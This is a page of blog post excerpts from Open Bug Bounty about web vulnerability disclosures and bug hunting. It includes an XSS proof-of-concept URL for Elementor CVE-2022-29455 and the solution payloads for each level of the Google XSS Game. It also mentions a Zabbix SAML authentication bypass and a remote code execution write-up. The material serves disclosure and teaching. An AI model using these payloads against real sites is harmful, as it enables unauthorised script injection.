Open Bug Bounty Blog

CVE 2022-29455 is still affecting millions of WordPress sites

Posted on July 8, 2022July 8, 2022 by 4websecurity

– The DOM-based Reflected Cross-Site Scripting (XSS) vulnerability is in Elementor’s Elementor Website Builder plugin <= 3.5.5 versions. This issue leads to: CVE 2022-29455 4websecurity.com already reported the vulnerability to tens of thousands websites that are using WordPress and this version of the plugin. Reference: – https://nvd.nist.gov/vuln/detail/CVE-2022-29455 – https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor – https://www.rotem-bar.com/elementor * POC (Proof Of Concept): The payload is Base64 encoded: https://example.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0= Decoded from Base64: https://example.com/#elementor-action:action=lightbox&settings={“type”:”video”,”url”:”http://”,”videoType”:”hosted”,”videoParams”:{“onerror”:”alert(document.domain)”}} Impact: XSS can cause…

Zabbix – SAML SSO Authentication Bypass

Posted on July 8, 2022 by kh4sh3i_

In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified. Dork: usage refrences https://nvd.nist.gov/vuln/detail/CVE-2022-23131 https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage https://github.com/Mr-xn/cve-2022-23131 https://github.com/projectdiscovery/nuclei-templates

The Time Machine — Weaponizing WaybackUrls for Recon, BugBounties , OSINT, Sensitive Endpoints and what not

Posted on July 8, 2022July 8, 2022 by FR13ND0x7F

You must have heard about time travel in movies, series and comics. Well here we are Nah i’m not joking you can travel back in time and can fetch the endpoints from web applications to do further exploitation, don’t believe me xD You will after Travelling from TheTimeMachine, PS Doesn’t work offline you need internet…

Ultimate XSS Polyglot

Posted on February 15, 2022 by sepkatpro

The Most used Chrome Extensions are Used For Penetration Testing.

Posted on November 11, 2021 by mistry4592

Mostly, penetration testing can use the extensions for the purpose to locate the broken links and inform the client, and these extensions also help to determine whether a target website contains vulnerabilities that can lead to adversarial exploitations and sensitive information theft. Here are the different chrome extensions that are used by penetration testing…. Wappalyzer…

How I Found My First Bug Reflected Xss On PIA.GOV.PH(Philippine Information Agency)

Posted on October 8, 2021October 8, 2021 by NNeuchi

Hi guys ,This is Neil Harvey Miñano a Newbie security researcher from Philippine.This is my 1st write-up and also I am not good at XSS so forgive all mistakes.It was 04/20/2021 and my 1st day of bug hunting.I’m still newbie!Today I am gonna to Share a Reflected Xss vulnerability what was reported by me to…

eG Manager v7.1.2: Improper Access Control lead to Remote Code Execution (CVE-2020-8591)

Posted on August 26, 2021August 26, 2021 by PyaePhyoThu98

Improper Access Control to Remote Code Execution (CVE-2020-8591)

In this post. I will explain how I hacked a whole system by exploiting improper access control vulnerability in the popular java-based MaaS software “eG Manager” and how I can escalated it to execute code remotely.

Impact

The Improper Access Control weakness describes a case where software fails to restrict access to an object properly. A malicious user can compromise security of the software and perform certain unauthorized actions by gaining elevated privileges, reading otherwise restricted information, executing commands, bypassing implemented security mechanisms, etc.

Interview With Open Bug Bounty

Posted on July 14, 2021July 14, 2021 by Open Bug Bounty

Speaking with the team at Open Bug Bounty was the highlight of her day for Aviva Zacks of Safety Detectives. She learned that their community-driven spirit is exactly what advantageously differentiates their project from the others out there.

https://www.safetydetectives.com/blog/interview-open-bug-bounty/

Google XSS Game

Posted on May 25, 2021May 25, 2021 by 0xrocky

https://xss-game.appspot.com/

Level #1: Hello, world of XSS
https://xss-game.appspot.com/level1
Solution: <script>alert('xss')</script>
hint: inspect the source code of the page

Level #2: Persistence is key
https://xss-game.appspot.com/level2
Solution: <img src=x onerror=alert('XSS')>
hint: “welcome” post contains HTML

Level #3: That sinking feeling…
https://xss-game.appspot.com/level3/frame#1
Solution: https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>

Level #4: Context matters
https://xss-game.appspot.com/level4/frame
Solution: timer=');alert('xss

Level #5: Breaking protocol
https://xss-game.appspot.com/level5/frame
Solution: https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')

Level #6: Follow the X
https://xss-game.appspot.com/level6/frame#/static/gadget.js
Solution: https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')

Testing for XSS (Cross Site Scripting)

Posted on May 25, 2021May 25, 2021 by ShivanshMalik12

Hi, So today ill tell some techniques of testing XSS, First of all these important things you should note: Copy pasting XSS payloads doesn’t work PoC or GTFO Its said like report checkers need a proper PoC for validation of the report, If doesn’t, Your report cannot be triaged. So first, For testing XSS you…

← Newer posts Older posts →

Open Bug Bounty Blog | page 2